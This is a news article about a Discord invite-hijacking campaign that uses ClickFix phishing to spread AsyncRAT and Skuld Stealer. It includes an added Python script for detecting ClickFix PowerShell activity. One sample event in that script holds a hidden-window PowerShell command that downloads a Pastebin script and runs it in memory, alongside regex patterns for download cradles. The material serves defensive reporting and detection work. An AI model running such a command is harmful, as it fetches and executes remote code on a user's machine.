A new malware campaign is exploiting Discord’s invite system to distribute AsyncRAT and a customized Skuld Stealer. Security researchers at Check Point revealed that threat actors hijacked expired or deleted vanity invite links to silently redirect users to fake servers under their control.
This technique abuses Discord’s inability to prevent the reuse of deleted or expired invite codes when creating custom links. Attackers leveraged this flaw to impersonate trusted servers previously shared on forums or communities.
Once redirected, users land on malicious Discord servers that mimic legitimate communities.
ClickFix Phishing Tricks Users into Executing Malware
The attackers used a social engineering method called ClickFix to trick victims into installing malware. After joining the rogue Discord server, users are asked to verify their identity by clicking a “Verify” button.
That button executes JavaScript, which copies a PowerShell command to the clipboard. Victims are then instructed to paste and run the command via the Windows Run dialog.
This command pulls a script from Pastebin that downloads a loader, eventually dropping both AsyncRAT and Skuld Stealer from remote servers hosted on Bitbucket and GitHub.
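The ClickFix chain above has a distinctive host-level footprint: a PowerShell process started from the shell (explorer.exe, which backs the Run dialog) whose command line fetches a script from a public paste or code host and executes it in memory. The following is an added detection example, not code from Check Point or the article; it scores constructed, Sysmon-style process-creation records (field names and sample values are assumptions) and flags those that match the pattern.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style). These are
# made-up records for the example, not telemetry from the campaign described above.
SAMPLE_EVENTS = [
    {   # ClickFix-like: pasted into the Run dialog, fetches and runs a paste in memory
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NoProfile -w hidden -c \"iex (iwr 'https://pastebin.com/raw/EXAMPLE')\"",
    },
    {   # Benign admin script launched from a scheduled task via cmd.exe
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\ops\backup.ps1",
    },
    {   # Not PowerShell at all
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
    },
]

# Hosts named in the article as script/loader sources; extend for your environment.
PASTE_HOSTS = ("pastebin.com", "bitbucket.org", "github.com", "raw.githubusercontent.com")
DOWNLOAD_CRADLE = re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|webclient|curl)\b", re.I)
IN_MEMORY_EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
STEALTH_FLAGS = re.compile(r"-(w|win|windowstyle)\s+hidden|-enc(odedcommand)?\b", re.I)

def score_event(ev):
    """Return (score, reasons) for one event; each matched indicator adds one point."""
    reasons = []
    image = ev.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    cmd = ev.get("CommandLine", "")
    if ev.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("PowerShell spawned by explorer.exe (Run dialog / user-pasted command)")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if IN_MEMORY_EXEC.search(cmd):
        reasons.append("in-memory execution of fetched content")
    if STEALTH_FLAGS.search(cmd):
        reasons.append("hidden window or encoded command")
    hosts = [h for h in PASTE_HOSTS if h in cmd.lower()]
    if hosts:
        reasons.append("fetch from public paste/code host: " + ", ".join(hosts))
    return len(reasons), reasons

def find_clickfix_candidates(events, threshold=3):
    """Return events whose indicator count reaches the threshold, with the reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"CommandLine": ev["CommandLine"], "score": score, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit["score"], hit["CommandLine"], hit["reasons"], sep="\n  ")
```

The threshold keeps a lone explorer.exe-spawned PowerShell (common for power users) from alerting on its own; the combination of shell parent, download cradle, in-memory execution and a paste-site URL is what separates ClickFix from routine administration.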
What the Malware Does
AsyncRAT allows full remote access and control over infected systems.
Skuld Stealer is a Golang-based info stealer designed to harvest data from browsers, gaming platforms, Discord, and cryptocurrency wallets.
The stealer specifically targets Exodus and Atomic wallets, extracting seed phrases and passwords using a wallet injection technique. It replaces app files with trojanized versions hosted on GitHub. The attackers also use ChromeKatz, a modified open-source tool, to bypass Chrome’s encryption and steal credentials.
Stolen data is exfiltrated via Discord webhooks, helping the campaign blend in with normal network traffic.
Wider Campaign and Global Impact
Check Point also discovered a parallel campaign run by the same actors. In that case, the malware was disguised as a tool for unlocking pirated games. This version was hosted on Bitbucket and downloaded over 350 times.
Victims of both campaigns were found primarily in the United States, Vietnam, France, Germany, Austria, Slovakia, the Netherlands, and the United Kingdom.
Discord has since disabled the malicious bot linked to these attacks, disrupting the infection chain.
About the author – Ayush Chaurasia is a postgraduate student passionate about cybersecurity, threat hunting, and global affairs. He explores the intersection of technology, psychology, national security, and geopolitics through insightful writing.